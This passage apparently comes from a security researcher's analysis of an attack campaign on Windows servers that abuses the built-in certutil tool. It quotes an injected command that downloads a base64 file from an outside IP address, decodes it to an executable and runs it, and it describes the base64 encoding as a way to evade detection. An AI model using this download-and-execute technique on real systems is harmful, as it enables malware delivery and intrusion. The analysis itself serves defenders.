Figure 2: Latest attack request targeting Windows servers

As shown in Figure 2, the latest attack requests are targeting the same URL, keeping the same HTTP header values and the same exploit structure, however, they are now using Windows shell commands to download and execute a file.

Using the Windows certutil Tool

While Linux ships with built-in command-line HTTP client tools like “curl” and “wget”, Windows doesn’t have parallel tools. The common alternative is to either write a Visual Basic or a PowerShell script or use the Windows BITSAdmin tool, which is typically used to download and upload jobs. We have already have witnessed attackers leveraging BITSAdmin in other campaigns. However, the current attackers chose to use a more creative technique, as the following injected commands show:

certutil -urlcache -split -f http://45.77.55.231/update.b64 update.b64 & certutil -decode update.b64 update.exe & update.exe

The attacker uses a command-line tool named “certutil” which, as described by Microsoft below, is part of the Windows operating system.

“Certutil.exe is a command-line program that is installed as part of Certificate Services. You can use Certutil.exe to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains.”

However, a lesser known feature of the tool is fetching and caching certificate files from remote hosts using the “urlcache” flag. This is useful in attack scenarios and even provides a simple evasion capability using base64 encoding certificate format, as shown in Figure 3.